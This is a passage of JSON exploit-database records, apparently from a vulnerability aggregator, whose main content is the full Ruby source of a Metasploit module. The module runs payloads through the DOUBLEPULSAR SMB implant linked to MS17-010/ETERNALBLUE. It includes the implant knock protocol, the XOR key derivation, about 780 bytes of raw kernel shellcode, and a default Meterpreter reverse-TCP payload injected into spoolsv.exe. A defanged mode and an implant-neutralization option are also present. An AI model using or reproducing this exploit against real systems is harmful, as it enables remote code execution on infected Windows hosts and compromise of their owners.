"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-29T22:21:24", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-29T22:21:24", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-30] #"}, "lastseen": "2021-10-29T22:21:24", "differentElements": ["sourceData"], "edition": 60}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e199937a24f9682ba634f28c03416368", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-30T23:13:26", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-29702"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-30T23:13:26", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-30T23:13:26", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
